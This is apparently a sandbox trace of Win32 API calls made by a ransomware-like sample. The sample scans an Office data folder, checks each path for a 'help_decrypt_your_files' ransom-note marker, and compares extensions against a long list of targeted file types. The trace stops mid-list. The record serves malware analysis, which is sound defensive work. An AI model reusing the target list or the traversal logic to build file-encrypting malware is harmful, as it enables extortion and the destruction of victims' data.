	[0171.251] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.251] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0171.251] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1
	[0171.251] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="..") returned 1
	[0171.251] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2=".") returned 1
	[0171.251] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.251] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="ClickToRunPackageLocker" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\ClickToRunPackageLocker") returned="C:\\Users\\All Users\\Microsoft\\Office\\ClickToRunPackageLocker"
	[0171.252] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\ClickToRunPackageLocker") returned 59
	[0171.252] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.252] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\ClickToRunPackageLocker", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\office\\clicktorunpackagelocker") returned 0x3b
	[0171.252] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\clicktorunpackagelocker" | out: lpString1="c:\\users\\all users\\microsoft\\office\\clicktorunpackagelocker") returned="c:\\users\\all users\\microsoft\\office\\clicktorunpackagelocker"
	[0171.252] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\clicktorunpackagelocker") returned 59
	[0171.252] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.252] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.253] StrStrW (lpFirst="cktorunpackagelocker", lpSrch=".") returned 0x0
	[0171.253] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xc114009a, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1
	[0171.253] lstrcmpW (lpString1="DocumentRepository.ico", lpString2="..") returned 1
	[0171.253] lstrcmpW (lpString1="DocumentRepository.ico", lpString2=".") returned 1
	[0171.253] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.253] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="DocumentRepository.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\DocumentRepository.ico") returned="C:\\Users\\All Users\\Microsoft\\Office\\DocumentRepository.ico"
	[0171.253] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\DocumentRepository.ico") returned 58
	[0171.253] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.254] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\DocumentRepository.ico", cchLength=0x3a | out: lpsz="c:\\users\\all users\\microsoft\\office\\documentrepository.ico") returned 0x3a
	[0171.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.254] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\documentrepository.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.254] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\documentrepository.ico" | out: lpString1="c:\\users\\all users\\microsoft\\office\\documentrepository.ico") returned="c:\\users\\all users\\microsoft\\office\\documentrepository.ico"
	[0171.254] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\documentrepository.ico") returned 58
	[0171.254] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.255] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0171.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.255] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0171.255] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xa8eea4a6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Heartbeat", cAlternateFileName="HEARTB~1")) returned 1
	[0171.255] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xc92aff08, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1
	[0171.255] lstrcmpW (lpString1="MySharePoints.ico", lpString2="..") returned 1
	[0171.256] lstrcmpW (lpString1="MySharePoints.ico", lpString2=".") returned 1
	[0171.256] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.256] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="MySharePoints.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\MySharePoints.ico") returned="C:\\Users\\All Users\\Microsoft\\Office\\MySharePoints.ico"
	[0171.256] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\MySharePoints.ico") returned 53
	[0171.256] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.256] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\MySharePoints.ico", cchLength=0x35 | out: lpsz="c:\\users\\all users\\microsoft\\office\\mysharepoints.ico") returned 0x35
	[0171.256] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.256] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\mysharepoints.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.256] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\mysharepoints.ico" | out: lpString1="c:\\users\\all users\\microsoft\\office\\mysharepoints.ico") returned="c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"
	[0171.257] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\mysharepoints.ico") returned 53
	[0171.257] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.257] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0171.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.257] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.d